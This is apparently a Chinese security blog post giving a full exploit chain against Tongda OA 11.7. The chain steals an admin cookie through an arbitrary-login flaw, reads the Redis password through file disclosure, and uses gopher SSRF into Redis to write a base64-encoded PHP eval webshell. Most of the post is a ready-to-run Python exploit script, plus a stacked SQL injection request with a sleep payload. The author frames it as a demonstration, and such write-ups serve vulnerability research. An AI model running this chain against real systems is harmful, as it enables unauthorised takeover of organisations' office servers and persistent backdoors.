其他
通达OA11.7 利用新思路(附EXP)
前言
炒个冷饭。都是垃圾小洞组合在一起。
任意用户登陆+获取安装目录+任意文件读取+ssrf-->redis -->写入文件-->getshell
一、 通过任意用户登陆拿到管理员的cookie
二、获取安装目录读取redis 配置文件
三、 ssrf 写入文件
四、getshell
通过任意用户登陆拿到管理员的cookie
通达OA 任意用户登陆条件需要管理员在线
http://192.168.1.22/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0
访问路径,覆盖了session直接用cookie登陆,访问目录/general/进入后台
这里已经登陆了。打开无痕模式
如果他什么都没有返回,说明是OK的。那么就利用当前的phpsessid进行访问
如果出现RELOGIN那说明。管理员不在线漏洞形成的过程
这里查询了UID 是否在线。CLIENT 默认为0 这个0代表浏览器
这个表存的是当前用户的登陆信息。UID 和时间。sid 是phpssion 的值。然后client 是客户端标识符。
获取安装目录读取redis 配置文件
/general/approve_center/archive/getTableStruc.php
首先是任意文件读取
/ispirit/im/photo.php?AVATAR_FILE=D:/MYOA/bin/redis.windows.conf&UID=2
读取到redis 密码。然后通过ssrf
/pda/workflow/img_download.php?PLATFORM=dd&ATTACHMENTS=gopher://127.0.0.1:6399/
完整exp
如下:
# -*- coding:utf-8 -*-import osimport requestsimport re# author :print("")import urllib
class GenerateUrl: def __init__(self, password, webroot, filename): self.password = passwordself.webroot = webrootself.filename = filenameself.webshell = ''' <?php file_put_contents('11.php',base64_decode('PD9waHAgQGV2YWwoJF9HRVRbMV0pPz4='))?>
''' self.template = '''_*2$4AUTH${password_len}{password}*1$8flushall*4$6CONFIG$3SET$10dbfilename${filename_len}{filename}*4$6CONFIG$3SET$3dir${webroot_len}{webroot}*3$3SET$11${content_len}{content}*1$4save*1$4quit
''' def __str__(self): webshell = self.webshellwebshell = webshell.replace('"', '%22').replace("'", '%27').replace(",", "%2c")webshell = webshell.replace(' ', '%20').replace('\n', '%0D%0A').replace('<', '%3c').replace('?', '%3f').replace('>', '%3e')self.template = self.template.replace("{password_len}", str(len(self.password)))self.template = self.template.replace("{password}", self.password)self.template = self.template.replace("{filename_len}", str(len(self.filename)))self.template = self.template.replace("{filename}", self.filename)self.template = self.template.replace("{webroot_len}", str(len(self.webroot)))self.template = self.template.replace("{webroot}", self.webroot)self.template = self.template.replace("{content_len}", str(len(self.webshell)))self.template = self.template.replace("{content}", webshell)self.template = self.template.replace('\n', '%0D%0A')return urllib.quote_plus(self.template)
proxies = {"http": "http://127.0.0.1:8080","https": "http://127.0.0.1:8080",}def headers(phpsesion): return {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1.6) ","Cookie": phpsesion}
# 获取绝对目录def get_path(url, headers): urlc = urlurl = (url + '/general/approve_center/archive/getTableStruc.php')try: data = requests.get(url=url, headers=headers, proxies=proxies).json()path = data['logPath'].split('\\')[0]url2 = urlc + '/ispirit/im/photo.php?AVATAR_FILE=%s/bin/redis.windows.conf&UID=2' % pathdata2 = requests.get(url=url2, headers=headers, proxies=proxies)ress = re.search('requirepass .+', data2.text).group()return {"path": path, "redis_pass": ress.replace('requirepass ', '').strip()}except: exit('ERROR Cookie PHPSESSID expired')
# ssrf写入文件def ssrf_webshell(url, path, password): urlc = urlpath = pathpassword = passworda = GenerateUrl(password, path + "/webroot/", "666.php")url = url + '/pda/workflow/img_download.php?PLATFORM=dd&ATTACHMENTS=%s' % ('gopher://127.0.0.1:6399/' + str(a))data = requests.get(url=url, headers=headers, proxies=proxies)ddd = requests.get(url=urlc + '/666.php')if ddd.status_code == 200: print('shell url:%s' % urlc + '/666.php')else: print('send shell ERROR')return True
def get_cookie(url): url = url+ "/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0" headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",}try: response = requests.get(url=url, headers=headers)if "RELOGIN" in response.text and response.status_code == 200: exit("目标用户为离线状态")elif response.status_code == 200 and response.text == "": print("好了马上就能getshell了")cookies = response.cookiescookie = requests.utils.dict_from_cookiejar(cookies)if cookie['SESSIONID']: return cookie['SESSIONID']else: exit('实在抱歉,getshell不了')else: print("未知错误,目标可能不存在或不存在该漏洞")except Exception as e: exit('实在抱歉,getshell不了')
if __name__ == '__main__': import systry: url = sys.argv[1]cookie =get_cookie(url)headers = headers(cookie)root_path = get_path(url, headers)ssrf_webshell(url, root_path['path'], root_path['redis_pass'])except: print('python tongda.py http://127.0.0.1')没有测试那个获取cookie 那个地方。这个需要如果测试中出现意外改改吧。纯演示思路
分享一个后台SQL 注入的点
这里支持堆叠注入。首先需要获取到通达OA的安装目录。然后into 写入shell 即可。=。=
POST /general/appbuilder/web/officeproduct/productapply/applyprobygroup HTTP/1.1Host:10.211.55.5Content-Length: 39Accept: */*DNT: 1X-Requested-With: XMLHttpRequestUserAgent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.103 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin:http://10.211.55.5Referer:http://10.211.55.5/general/officeProduct/product_apply/index.phpAccept-Language: en,zh-CN;q=0.9,zh;q=0.8Cookie: SID_12=530bf0a5; SID_27=7202df24; USER_NAME_COOKIE=admin; OA_USER_ID=admin; PHPSESSID=1plu8qbupnesf40l9d02fdlvm5; SID_1=24205621Connection: closearr[5][pro_id]=151';select sleep(3) %23